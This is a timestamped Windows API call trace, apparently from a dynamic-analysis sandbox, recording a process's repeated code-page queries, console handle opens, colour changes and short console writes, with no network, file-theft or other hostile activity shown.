	[0043.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.607] GetLastError () returned 0xcb
	[0043.607] GetConsoleOutputCP () returned 0x1b5
	[0043.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.607] GetLastError () returned 0xcb
	[0043.607] GetConsoleOutputCP () returned 0x1b5
	[0043.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.608] GetLastError () returned 0xcb
	[0043.608] GetConsoleOutputCP () returned 0x1b5
	[0043.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.608] GetLastError () returned 0xcb
	[0043.608] GetConsoleOutputCP () returned 0x1b5
	[0043.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.608] GetLastError () returned 0xcb
	[0043.608] GetConsoleOutputCP () returned 0x1b5
	[0043.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.608] GetLastError () returned 0xcb
	[0043.608] GetConsoleOutputCP () returned 0x1b5
	[0043.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.608] GetLastError () returned 0xcb
	[0043.608] GetConsoleOutputCP () returned 0x1b5
	[0043.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.609] GetLastError () returned 0xcb
	[0043.609] GetConsoleOutputCP () returned 0x1b5
	[0043.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.609] GetLastError () returned 0xcb
	[0043.609] GetConsoleOutputCP () returned 0x1b5
	[0043.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.609] GetLastError () returned 0xcb
	[0043.609] GetConsoleOutputCP () returned 0x1b5
	[0043.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.609] GetLastError () returned 0xcb
	[0043.609] GetConsoleOutputCP () returned 0x1b5
	[0043.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.610] GetLastError () returned 0xcb
	[0043.610] GetConsoleOutputCP () returned 0x1b5
	[0043.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.610] GetLastError () returned 0xcb
	[0043.610] GetConsoleOutputCP () returned 0x1b5
	[0043.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.610] GetLastError () returned 0xcb
	[0043.610] GetConsoleOutputCP () returned 0x1b5
	[0043.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.611] GetLastError () returned 0xcb
	[0043.611] GetConsoleOutputCP () returned 0x1b5
	[0043.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.611] GetLastError () returned 0xcb
	[0043.611] GetConsoleOutputCP () returned 0x1b5
	[0043.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.611] GetLastError () returned 0xcb
	[0043.611] GetConsoleOutputCP () returned 0x1b5
	[0043.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.611] GetLastError () returned 0xcb
	[0043.611] GetConsoleOutputCP () returned 0x1b5
	[0043.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.611] GetLastError () returned 0xcb
	[0043.611] GetConsoleOutputCP () returned 0x1b5
	[0043.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.611] GetLastError () returned 0xcb
	[0043.612] GetConsoleOutputCP () returned 0x1b5
	[0043.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.612] GetLastError () returned 0xcb
	[0043.612] GetConsoleOutputCP () returned 0x1b5
	[0043.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.612] GetLastError () returned 0xcb
	[0043.612] GetConsoleOutputCP () returned 0x1b5
	[0043.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.612] GetLastError () returned 0xcb
	[0043.612] GetConsoleOutputCP () returned 0x1b5
	[0043.615] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.615] GetLastError () returned 0xcb
	[0043.615] GetConsoleOutputCP () returned 0x1b5
	[0043.615] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.615] GetLastError () returned 0xcb
	[0043.615] GetConsoleOutputCP () returned 0x1b5
	[0043.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.616] GetLastError () returned 0xcb
	[0043.616] GetConsoleOutputCP () returned 0x1b5
	[0043.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.616] GetLastError () returned 0xcb
	[0043.616] GetConsoleOutputCP () returned 0x1b5
	[0043.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.616] GetLastError () returned 0xcb
	[0043.616] GetConsoleOutputCP () returned 0x1b5
	[0043.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.616] GetLastError () returned 0xcb
	[0043.616] GetConsoleOutputCP () returned 0x1b5
	[0043.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.618] GetLastError () returned 0xcb
	[0043.618] GetConsoleOutputCP () returned 0x1b5
	[0043.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.619] GetLastError () returned 0xcb
	[0043.619] GetConsoleOutputCP () returned 0x1b5
	[0043.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.619] GetLastError () returned 0xcb
	[0043.619] GetConsoleOutputCP () returned 0x1b5
	[0043.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.619] GetLastError () returned 0xcb
	[0043.619] GetConsoleOutputCP () returned 0x1b5
	[0043.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.619] GetLastError () returned 0xcb
	[0043.619] GetConsoleOutputCP () returned 0x1b5
	[0043.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.620] GetLastError () returned 0xcb
	[0043.620] GetConsoleOutputCP () returned 0x1b5
	[0043.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.620] GetLastError () returned 0xcb
	[0043.620] GetConsoleOutputCP () returned 0x1b5
	[0043.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.620] GetLastError () returned 0xcb
	[0043.620] GetConsoleOutputCP () returned 0x1b5
	[0043.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.620] GetLastError () returned 0xcb
	[0043.620] GetConsoleOutputCP () returned 0x1b5
	[0043.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.620] GetLastError () returned 0xcb
	[0043.620] GetConsoleOutputCP () returned 0x1b5
	[0043.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.621] GetLastError () returned 0xcb
	[0043.621] GetConsoleOutputCP () returned 0x1b5
	[0043.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.621] GetLastError () returned 0xcb
	[0043.621] GetConsoleOutputCP () returned 0x1b5
	[0043.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.621] GetLastError () returned 0xcb
	[0043.621] GetConsoleOutputCP () returned 0x1b5
	[0043.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.621] GetLastError () returned 0xcb
	[0043.621] GetConsoleOutputCP () returned 0x1b5
	[0043.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.621] GetLastError () returned 0xcb
	[0043.621] GetConsoleOutputCP () returned 0x1b5
	[0043.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.622] GetLastError () returned 0xcb
	[0043.622] GetConsoleOutputCP () returned 0x1b5
	[0043.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.622] GetLastError () returned 0xcb
	[0043.622] GetConsoleOutputCP () returned 0x1b5
	[0043.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.622] GetLastError () returned 0xcb
	[0043.622] GetConsoleOutputCP () returned 0x1b5
	[0043.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.622] GetLastError () returned 0xcb
	[0043.622] GetConsoleOutputCP () returned 0x1b5
	[0043.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.622] GetLastError () returned 0xcb
	[0043.622] GetConsoleOutputCP () returned 0x1b5
	[0043.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.623] GetLastError () returned 0xcb
	[0043.623] GetConsoleOutputCP () returned 0x1b5
	[0043.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.623] GetLastError () returned 0xcb
	[0043.623] GetConsoleOutputCP () returned 0x1b5
	[0043.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.623] GetLastError () returned 0xcb
	[0043.623] GetConsoleOutputCP () returned 0x1b5
	[0043.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.623] GetLastError () returned 0xcb
	[0043.623] GetConsoleOutputCP () returned 0x1b5
	[0043.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.623] GetLastError () returned 0xcb
	[0043.624] GetConsoleOutputCP () returned 0x1b5
	[0043.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.624] GetLastError () returned 0xcb
	[0043.624] GetConsoleOutputCP () returned 0x1b5
	[0043.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.624] GetLastError () returned 0xcb
	[0043.624] GetConsoleOutputCP () returned 0x1b5
	[0043.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.624] GetLastError () returned 0xcb
	[0043.624] GetConsoleOutputCP () returned 0x1b5
	[0043.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.624] GetLastError () returned 0xcb
	[0043.624] GetConsoleOutputCP () returned 0x1b5
	[0043.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.625] GetLastError () returned 0xcb
	[0043.630] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17
	[0043.631] GetLastError () returned 0xcb
	[0043.631] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.631] GetLastError () returned 0xcb
	[0043.631] GetConsoleOutputCP () returned 0x1b5
	[0043.631] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.631] GetLastError () returned 0xcb
	[0043.632] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0043.632] GetLastError () returned 0xcb
	[0043.632] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x573efd0 | out: lpMode=0x573efd0) returned 1
	[0043.632] GetLastError () returned 0xcb
	[0043.636] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b
	[0043.637] GetLastError () returned 0xcb
	[0043.637] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.637] GetLastError () returned 0xcb
	[0043.641] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f
	[0043.642] GetLastError () returned 0xcb
	[0043.642] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.642] GetLastError () returned 0xcb
	[0043.646] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0043.646] GetLastError () returned 0xcb
	[0043.646] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.647] GetLastError () returned 0xcb
	[0043.649] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0043.650] GetLastError () returned 0xcb
	[0043.653] CloseHandle (hObject=0x23) returned 1
	[0043.654] GetLastError () returned 0xcb
	[0043.658] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0043.659] GetLastError () returned 0xcb
	[0043.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.660] GetLastError () returned 0xcb
	[0043.660] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0043.660] GetLastError () returned 0xcb
	[0043.662] CloseHandle (hObject=0x23) returned 1
	[0043.662] GetLastError () returned 0xcb
	[0043.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0043.663] GetLastError () returned 0xcb
	[0043.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x573ef68 | out: lpMode=0x573ef68) returned 1
	[0043.663] GetLastError () returned 0xcb
	[0043.667] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0043.669] GetLastError () returned 0xcb
	[0043.669] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.669] GetLastError () returned 0xcb
	[0043.672] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x22804a0*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x22804a0*, lpNumberOfCharsWritten=0x573ef4c*=0x4f) returned 1
	[0043.675] GetLastError () returned 0xcb
	[0043.677] CloseHandle (hObject=0x23) returned 1
	[0043.677] GetLastError () returned 0xcb
	[0043.681] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0043.682] GetLastError () returned 0xcb
	[0043.682] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.682] GetLastError () returned 0xcb
	[0043.682] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0043.683] GetLastError () returned 0xcb
	[0043.683] CloseHandle (hObject=0x23) returned 1
	[0043.683] GetLastError () returned 0xcb
	[0043.687] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0043.687] GetLastError () returned 0xcb
	[0043.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.687] GetLastError () returned 0xcb
	[0043.687] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0043.688] GetLastError () returned 0xcb
	[0043.688] CloseHandle (hObject=0x23) returned 1
	[0043.688] GetLastError () returned 0xcb
	[0043.692] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0043.692] GetLastError () returned 0xcb
	[0043.692] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.692] GetLastError () returned 0xcb
	[0043.692] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.693] GetLastError () returned 0xcb
	[0043.693] CloseHandle (hObject=0x23) returned 1
	[0043.693] GetLastError () returned 0xcb
	[0043.697] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0043.698] GetLastError () returned 0xcb
	[0043.698] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.698] GetLastError () returned 0xcb
	[0043.698] GetConsoleOutputCP () returned 0x1b5
	[0043.699] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.699] GetLastError () returned 0xcb
	[0043.701] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27
	[0043.701] GetLastError () returned 0xcb
	[0043.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.702] GetLastError () returned 0xcb
	[0043.704] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b
	[0043.704] GetLastError () returned 0xcb
	[0043.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.705] GetLastError () returned 0xcb
	[0043.707] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0043.708] GetLastError () returned 0xcb
	[0043.708] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.708] GetLastError () returned 0xcb
	[0043.708] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0043.708] GetLastError () returned 0xcb
	[0043.708] CloseHandle (hObject=0x2f) returned 1
	[0043.709] GetLastError () returned 0xcb
	[0043.712] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0043.712] GetLastError () returned 0xcb
	[0043.712] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.712] GetLastError () returned 0xcb
	[0043.713] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0043.713] GetLastError () returned 0xcb
	[0043.713] CloseHandle (hObject=0x2f) returned 1
	[0043.713] GetLastError () returned 0xcb
	[0043.716] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0043.716] GetLastError () returned 0xcb
	[0043.716] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.717] GetLastError () returned 0xcb
	[0043.717] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2280bc4*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x2280bc4*, lpNumberOfCharsWritten=0x573ef4c*=0x4f) returned 1
	[0043.717] GetLastError () returned 0xcb
	[0043.717] CloseHandle (hObject=0x2f) returned 1
	[0043.717] GetLastError () returned 0xcb
	[0043.720] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0043.720] GetLastError () returned 0xcb
	[0043.720] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.721] GetLastError () returned 0xcb
	[0043.721] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0043.721] GetLastError () returned 0xcb
	[0043.721] CloseHandle (hObject=0x2f) returned 1
	[0043.721] GetLastError () returned 0xcb
	[0043.724] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0043.724] GetLastError () returned 0xcb
	[0043.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.725] GetLastError () returned 0xcb
	[0043.725] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0043.725] GetLastError () returned 0xcb
	[0043.725] CloseHandle (hObject=0x2f) returned 1
	[0043.725] GetLastError () returned 0xcb
	[0043.729] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0043.729] GetLastError () returned 0xcb
	[0043.729] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.729] GetLastError () returned 0xcb
	[0043.729] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.730] GetLastError () returned 0xcb
